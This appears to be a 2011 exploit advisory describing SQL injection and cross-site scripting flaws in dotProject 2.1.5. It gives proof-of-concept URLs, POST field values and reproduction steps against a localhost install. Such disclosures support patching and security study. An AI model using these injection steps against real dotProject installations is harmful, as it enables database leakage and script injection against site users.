# exploit title: sql injection in dotproject 2.1.5 # date 21.o2.2o11 # author: lemlajt # software : dotproject # version: 2.1.5 # tested on: linux # cve : # http://dotproject.net/ PoC : http://localhost/www/cmsadmins/dotpro/dotproject/fileviewer.php?file_id=' in src: 2 ./dotproject/fileviewer.php: 127 db_loadHash('SELECT * FROM (`dotp_files`) WHERE file_id = -9',NULL) another xss/sqli is here: POST http://localhost/www/cmsadmins/dotpro/dotproject/index.php?m=projects $department=company_1"> we get an error with sql infos and xss. 1. visit http://localhost/www/cmsadmins/dotpro/dotproject/index.php?m=projects&a=addedit (adding new project) 2. POST $project_name="> and choose 'company' to submit the form. 3. to see some affects just visit new project page: (in this example) http://localhost/www/cmsadmins/dotpro/dotproject/index.php?m=projects&a=view&project_id=2 # * regards! o/